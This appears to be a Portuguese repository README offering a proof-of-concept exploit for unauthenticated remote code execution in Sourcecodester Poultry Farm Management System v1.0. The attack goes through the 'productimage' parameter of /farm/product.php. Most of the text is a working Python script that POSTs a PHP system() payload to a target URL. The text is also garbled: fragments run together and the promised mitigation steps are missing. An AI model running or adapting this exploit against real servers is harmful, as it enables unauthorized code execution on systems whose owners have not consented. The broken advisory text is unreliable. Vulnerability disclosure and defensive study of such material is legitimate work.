
Script de prova de conceito que demonstra execução remota de código não autenticada no Sourcecodester Poultry Farm Management System por meio do parâmetro vulnerável productimage.
Este repositório contém um script de Prova de Conceito (PoC) que demonstra uma vulnerabilidade de execução remota de código (RCE) não autenticada no Sourcecodester Poultry Farm Management System v1.0. A vulnerabilidade existe no parâmetro productimage em /farm/product.php, permitindo que um invasor execute código arbitrário no servidor.
CVE-ID: (Pendente)
Visão Geral:
O Sourcecodester Poultry Farm Management System v1.0 contém uma vulnerabilidade de execução remota de código (RCE) não autenticada através do parâmetro productimage em . Esta vulnerabilidade permite que um invasor execute código arbitrário no servidor sem autenticação.
/farm/product.phpVersão Afetada:
requests (pip install requests)Este script demonstra como um invasor pode explorar a vulnerabilidade RCE enviando uma requisição maliciosa para o parâmetro vulnerável.
Salve o seguinte script como rce_poc.py e execute-o.
import requests
# Configuração
target_url = "http://target-url/farm/product.php" # Altere para a URL alvo
# Payload malicioso
# O payload deve ser um comando que o servidor possa executar, ex.: 'ls' para listar diretórios
# Aqui, estamos usando um payload PHP simples para demonstrar o RCE
payload = "<?php system('ls'); ?>"
# Construir a requisição maliciosa
data = {
'productimage': payload # O parâmetro vulnerável
}
def exploit_rce(url, data):
"""
Explora a vulnerabilidade RCE enviando uma requisição maliciosa para a URL alvo.
Args:
url (str): A URL alvo.
data (dict): Os dados a serem enviados na requisição POST.
"""
try:
response = requests.post(url, data=data)
# Imprimir os detalhes da resposta
print("Código de Status:", response.status_code)
print("Corpo da Resposta:", response.text)
if response.status_code == 200:
print("[+] Payload executado com sucesso.")
else:
print("[-] Falha ao executar o payload.")
except requests.RequestException as e:
print(f"[-] Ocorreu um erro: {e}")
if __name__ == "__main__":
print(f"Enviando requisição maliciosa para: {target_url}")
exploit_rce(target_url, data)
target_url para o endpoint /farm/product.php do servidor vulnerável.productimage.exploit_rce() envia a requisição maliciosa para a URL alvo e imprime os detalhes da resposta.Para mitigar esta vulnerabilidade, aplique as seguintes etapas:
Seguindo estas etapas de mitigação e práticas recomendadas de segurança, você pode evitar vulnerabilidades como este problema de RCE no Sourcecodester Poultry Farm Management System v1.0.